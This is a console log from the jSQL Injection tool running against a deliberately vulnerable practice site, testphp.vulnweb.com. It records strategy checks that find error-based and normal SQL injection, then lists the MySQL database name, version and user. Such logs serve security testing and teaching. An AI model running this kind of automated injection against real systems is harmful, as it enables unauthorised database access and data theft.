[15:50:39,131] jSQL Injection v0.81 on Java 1.8.0_91-amd64-en
[15:50:39,381] [In progress] Tampering against WAF.
[15:50:39,381] [Roadmap] Burp integration, Crawler, Dump to a file, Full Path Disclosure, WAF detection.
[15:50:39,381] [Done] Translation update: German, Arabic, Portuguese, Romanian.
[15:50:39,381] [Feature] Help the community and translate jSQL into your language. Click on the top right button to show the advanced settings and open menu Community, choose a language using 'I help translate jSQL' and translate some text then click on Send. Your translation will be integrated to the next release by the developer.
[15:50:44,417] Starting new injection: http://testphp.vulnweb.com/listproducts.php?cat=1
[15:50:44,432] Connection test...
[15:50:44,887] Found status HTTP 200 Success
[15:50:45,027] Found 1 <form> in HTML body while status 200 Success:
<form action="search.php?test=query" method="post" />
    <input name="searchFor" value="" />
    <input name="goButton" value="go" />
[15:50:45,058] Checking insertion characters...
[15:50:45,323] Found character insertion [-1] in place of [1] to detect error on ORDER BY
[15:50:45,323] Add manually the character * like [1*] to force the value [1]
[15:50:45,323] Using insertion character [-1]
[15:50:45,667] Found database [MySQL]
[15:50:45,667] Using database [MySQL]
[15:50:45,667] Checking strategy Time...
[15:50:46,168] Checking strategy Blind...
[15:50:47,080] Checking strategy Error...
[15:50:47,080] Checking BIGINT::exp...
[15:50:47,266] Checking BIGINT::exp in Order By...
[15:50:47,453] Checking BIGINT::exp in Delete Update Insert...
[15:50:47,642] Checking DOUBLE::exp...
[15:50:47,823] Checking DOUBLE::exp in Order By...
[15:50:48,012] Checking DOUBLE::exp in Delete Update Insert...
[15:50:48,200] Checking GROUPBY::floor_rand...
[15:50:48,512] Vulnerable to GROUPBY::floor_rand using 60 characters
[15:50:48,512] Checking GROUPBY::floor_rand in Order By...
[15:50:48,699] Checking GROUPBY::floor_rand in Delete Insert Update...
[15:50:48,888] Checking JSON::json_keys...
[15:50:49,076] Checking JSON::json_keys in Order By...
[15:50:49,294] Checking JSON::json_keys in Delete Insert Update...
[15:50:49,481] Checking XML::extractvalue...
[15:50:49,889] Vulnerable to XML::extractvalue using 27 characters
[15:50:49,889] Checking XML::extractvalue in Order By...
[15:50:50,077] Checking XML::extractvalue in Delete Insert Update...
[15:50:50,266] Checking strategy Normal...
[15:50:54,835] Vulnerable to Normal injection using 134721 characters
[15:50:54,835] Using strategy [Normal]
[15:50:54,835] Fetching informations...
[15:50:55,038] Database [acuart] on MySQL [5.1.73-0ubuntu0.10.04.1] for user [acuart@localhost]
[15:50:55,038] Fetching databases...
[15:50:55,459] Done